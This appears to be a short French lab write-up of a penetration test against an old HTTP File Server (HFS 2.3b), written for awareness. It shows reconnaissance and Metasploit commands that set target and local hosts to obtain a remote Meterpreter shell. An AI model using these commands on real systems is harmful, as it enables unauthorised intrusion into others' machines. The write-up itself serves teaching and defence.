Test d'intrusion sur un HTTP File Server

Cet article présente un test d’intrusion sur une ancienne version de HTTP File Server afin de sensibiliser le lecteur aux différentes vulnérabilités possibles pour qu’il s’en prémunisse.

Tous les exemples montrés sur cet article l’ont été sur des machines de laboratoires.

HTTP File Server abrégé HFS permet d’envoyer et de recevoir des fichiers en utilisant le protocole HTTP. Le 31 octobre 2021, la dernière version était 2.3m.

Avec une ancienne version, la 2.3 b, il était possible d’obtenir un shell sur la machine avec metasploit.

Reconnaissance

Lors d’une 1ère phase de reconnaissance, en lançant un scan avec Nessus, celui-ci a trouvé qu’un serveur HTTP HFS était installé à l’adresse IP avec le port 80.

Petite remarques : cette hôte n’était pas détecté en lançant le scan nmap suivant : `sudo nmap -O

hfs-recon

On peut vérifier la présence du serveur en se connectant avec son navigateur. On arrive alors sur la page principale d’HFS.

On peut voir en bas que la version est 2.3. A ce stade, il n’est pas encore possible d’être sûr à 100% que cette version est vulnérable

hfs

Exploit

En faisant une recherche avec google, un module metasploit efficace contre la version 2.3 b est disponible

Documentation : www.rejetto.com/hfs/

Il suffit alors de lancer metasploit, d’effectuer la configuration des hôtes et de lancer l’exploit

use use exploit/windows/http/rejetto_hfs_exec
set RHOSTS <IP server>  #Target
set LHOST <IP localhost> #Local host ip

Bingo, la machine était bien vulnérable à l’exploit. On obtient par conséquent un shell sur la machine permettant de lire les fichiers s’y trouvant

meterpreter-result

Conclusion

L’utilisation d’une version obsolète de HFS (2.3 b) contenant une vulnérabilité connue a permis d’obtenir un shell sur la machine. Cette démonstration n’aurait pas été possible si la version avait été mise à jour.

Source :

You might also enjoy